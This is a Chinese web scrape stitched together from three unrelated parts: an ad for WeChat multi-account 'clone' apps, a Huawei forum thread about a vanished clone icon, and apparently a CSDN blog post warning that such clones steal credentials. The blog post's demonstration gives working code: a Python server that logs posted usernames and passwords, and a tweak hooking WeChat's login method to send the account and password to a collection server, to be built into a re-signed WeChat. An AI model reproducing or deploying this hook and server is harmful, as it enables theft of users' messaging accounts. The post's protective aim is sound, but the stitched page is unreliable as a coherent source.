休闲娱乐生活服务其他类别
热门新闻更多
实时热点榜单热门视频发现好货
阅读下一篇视频推荐苏州旭阳电子科技有限公司
优质信息推广广告
您的位置：
> 微信分身宝
微信分身宝
点击次数：176发布时间：
更新日期：
所 在 地：中国大陆
产品型号：
简单介绍：微信分身宝微信分身宝微信分身宝哪里卖微信分身宝
相关标签：&
联系人：秦经理
微信多开宝、微信分身版、微信多开微信多开分身，朋友圈小视频转发一键安装无需越狱，一个手机多开多个微信多开也不卡顿！不闪退！不封号！值得你信赖的多开开发商苹果、安卓微信多开宝分身版，小视频转发无需越狱一键安装稳定方便快捷0封号！V_信号：aiqiyi-vip-5Q Q：&
会员类型：免费会员
工商认证： 【未认证】
最后认证时间：
企业类型：生产商
注册资金：人民币万
请告知该产品价格与相关资料，谢谢！后使用快捷导航没有帐号？
平板/笔记本
云服务专区
手机重启。微信分身图标没有了。
&登堂入室&
来自：浏览器
荣耀7卡死了。昨天刚刚初始化了系统，升级一下手机发现有分身了，高兴了一下，手机重新启动完成，荣耀7的微信分身图标没有了，论坛的方法都用了，还是没有用滴说。汗.不知道如何解决呢。
说明一下，我的微信是移入tf卡了。和这个有没有关系，毕竟16g的伤不起啊。
width:100%">
&登堂入室&
来自：浏览器
宝宝麻烦你进入手机设置，查看是否有应用分身选项，有即支持，没有即不支持。
width:100%">
&登堂入室&
来自：浏览器
晕，有应用分身选项，都已经开了手机重新启动，微信分身图标没有了，是这个原因
width:100%">
&新学乍练&
来自：浏览器
width:100%">
&热心花粉&
来自：荣耀6 H60-L03
楼主把分身的软件安装到内部存储里重启手机图标就不会消失了
width:100%">
&登堂入室&
来自：浏览器
爱两 发表于
楼主把分身的软件安装到内部存储里重启手机图标就不会消失了
我去测试一下
width:100%">
&登堂入室&
来自：浏览器
hzhh888 发表于
我去测试一下
width:100%">
&登堂入室&
来自：浏览器
顶一下，有哪位给个解决方式
width:100%">
&略有小成&
来自：浏览器
width:100%">
&登堂入室&
来自：浏览器
设置-应用管理-菜单-显示系统进程-找到华为桌面-储存-删除数据。然后回来了。但是桌面就乱了 全乱了。
width:100%">
1000万花粉
纪念花粉俱乐部注册花粉数超过1000万
关注华为花粉俱乐部微信公众平台——“华为花粉俱乐部”
申请成为热心花粉，满足热心花粉条件即可获得！http://cn./forum.php?mod=viewthread&tid=183642
新疆秋色--胡杨林极简国庆去公园蝶蝶不休霜叶红于二月花炸裂的开场
花粉客户端
Make it Possible
Make your device special
华为云服务
Huawei cloud services
音乐播放器
Huawei Music
Huawei Vmall
没有最新动态
关注花粉俱乐部
举报邮箱：
|关注花粉俱乐部：
Copyright (C)
华为软件技术有限公司 版权所有 保留一切权利14961人阅读
最近微信分身版各种疯传，不少人都安装了不同功能的微信分身版，不管是一键转发，一键评论还是带有其它功能的微信分身版。
&&&&&&& 很显然很多人安装了这些分身版却不知道其中可能存在的风险，这些微信分身版无非就是通过load command动态库注入hook函数进行篡改，虽然你的手机没有越狱，但是安装了微信分身版后，你所用微信的所有信息都暴露在别人的面前了。包括获取你的微信账号密码，聊天记录等等，所有的信息。
&&&&&&& 下面笔者就从如何获取微信账号密码并传到指定服务器做一个简单的分析，看完这个后，你安装的分身版微信很可能就已经收集你的微信账号和密码。
首先进入微信登录界面，查看ViewController的继承关系：
[[[UIWindow keyWindow] rootViewController] _printHierarchy]
&MMUINavigationController 0×&, state: appeared, view: &UILayoutContainerView 0x17f33790&
&&&&&&&&&&&&&& | &WCAccountLoginLastUserViewController 0x18b52600&, state: appeared, view: &UIView 0x&
&&&&&&& 可以得到当前的ViewController为WCAccountLoginLastUserViewController,跟踪该类。然后点击登录按钮，可以看到调用onNext方法。使用IDA进入里面分析，可以得知是WCAccountLoginControlLogic类来负责处理具体的登录逻辑。跟踪WCAccountLoginControlLogic可以发现登录的时候调用了
- (void)onLastUserLoginUserName:(NSString*) name Pwd:(NSString*) pwd{}
&&&&&&& 其中传的参数就是微信的账号和密码，现在演示一下如何拦截微信账号密码，并发送到指定服务器。
&&&&&&& 既然需要一个服务器来接受传输的数据，那么就使用python的BaseHTTPRequestHandler来搭建一个简单的服务器。
#!/usr/bin/env python&
# -*- conding:utf-8 -*-&
from&BaseHTTPServer&import&BaseHTTPRequestHandler,&HTTPServer
from&urlparse&import&urlparse,&parse_qs
DEFAULT_HOST&=&''&&
DEFAULT_PORT&=&8080&&
class&RequestHandler(BaseHTTPRequestHandler):
& &&def&do_GET(self):
& & & & params=parse_qs(urlparse(self.path).query)&&
& & & &&self.send_response(200)&&
& & & &&self.send_header('Content-type','text/html')&&
& & & &&self.end_headers()&&
& & & &&#获取账号密码
& & & & fread&=&open('./pwd.log','r')
& & & & lines&=&fread.readlines();
& & & & &#每隔2秒刷新一次
& & & & content&=&'&meta
http-equiv=&refresh& content=&2&&'
& & & &&for&line&in&lines:
& & & & & content&=&content+line+'&br&'
& & & &&# Send the message to browser &
& & & &&self.wfile.write(content)&&
& & & &&return&&
& &&def&do_POST(self):
& & & & params=parse_qs(urlparse(self.path).query)&&
& & & &&#保存账号密码
& & & & fwrite&=&open('./pwd.log','a+')
& & & & fwrite.write(&username=%s\n&&%
params['name'][0])
& & & & fwrite.write(&pwd=%s\n&&%
params['pwd'][0])
& & & & fwrite.close()
& & & &&self.send_response(200)&&
& & & &&self.end_headers()&&
& & & &&return&&
def&run_server():
& &&try: &
& & & & server_address=(DEFAULT_HOST,&DEFAULT_PORT)&&
& & & & server=&HTTPServer(server_address,RequestHandler)&&
& & & &&print&&HTTP
server started on port: %s&&% DEFAULT_PORT &
& & & & server.serve_forever()&&
& &&except&Exception,&err:
& & & &&print&&Error:%s&&%err
& &&except&KeyboardInterrupt:
& & & &&print&&Server
interrupted and is shutting down...&&&
& & & & server.socket.close()&&
if&__name__&==&&__main__&:
& & run_server()
&&&&&&& 好了，一个简单的服务器搭建好了，post用来接受从微信传过来的账号和密码信息并保存到本地文件，然后通过get不断去请求刷新获取的账号密码。
&&&&&&& 编写tweak拦截账号密码，并发送到刚刚搭建的服务器上：
%hook WCAccountLoginControlLogic
-&(void)onLastUserLoginUserName:(NSString*)&name
Pwd:(NSString*)&pwd{
& & NSMutableURLRequest&*request=[NSMutableURLRequest
requestWithURL:[NSURL
URLWithString:[NSString
stringWithFormat:@&http://192.168.1.100:8080?name=%@&pwd=%@&,name,pwd]]];
& &&[request setTimeoutInterval:30];
& &&[request setHTTPMethod:@&POST&];
& &&[NSURLConnection sendAsynchronousRequest:request
queue:[NSOperationQueue
mainQueue]
&& & & & & & & & & & & & & completionHandler:^(NSURLResponse&*respone,
& & & & & & & & & & & & & & & & & & & & & & & &
&& & & & & & & & & & & & & & & & & & & & & & & NSData&*data,
& & & & & & & & & & & & & & & & & & & & & & & &
&& & & & & & & & & & & & & & & & & & & & & & & NSError&*error)
&& & & & NSHTTPURLResponse*&httpResponse&=&(NSHTTPURLResponse*)respone;
&& & & &&if(httpResponse.statusCode&==&200){
&& & & & & & NSLog(@&send
pwd success!&);
&& & & &&}
&&&&&&& 重签名微信，生成一个在非越狱机器上运行的微信分身版，这个已经在上一篇文章中讲过。进入登录界面输入账号密码，每次输入账号密码就发把账号密码发送到我们搭建的服务器上面，然后在浏览器输入就能实时看到输入的账号密码是什么了。
&&&&&&& 上面只是一个简单的演示，当然实际的分身版不可能写的这么简单，一般都经过混淆和加密的，但是也就是说，一旦你安装了微信分身版，那么你微信上面所有的信息都可能被监控，导致隐私泄露。
&&&&&&& 从网上下了一个分身版的微信就在其中的dylib文件中发现了上传账号密码的代码&&&
所以即使你的手机没有越狱，也不要去网上下载微信分身版，也不要去第三方渠道下载应用，因为很可能你在第三方渠道下载的应用就是被篡改过的。
本文链接：
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：106629次
积分：1010
积分：1010
排名：千里之外
原创：24篇
转载：39篇
(1)(1)(2)(2)(1)(3)(9)(16)(2)(11)(5)(1)(4)(1)(1)(2)(1)
(window.slotbydup = window.slotbydup || []).push({
id: '4740881',
container: s,
size: '200,200',
display: 'inlay-fix'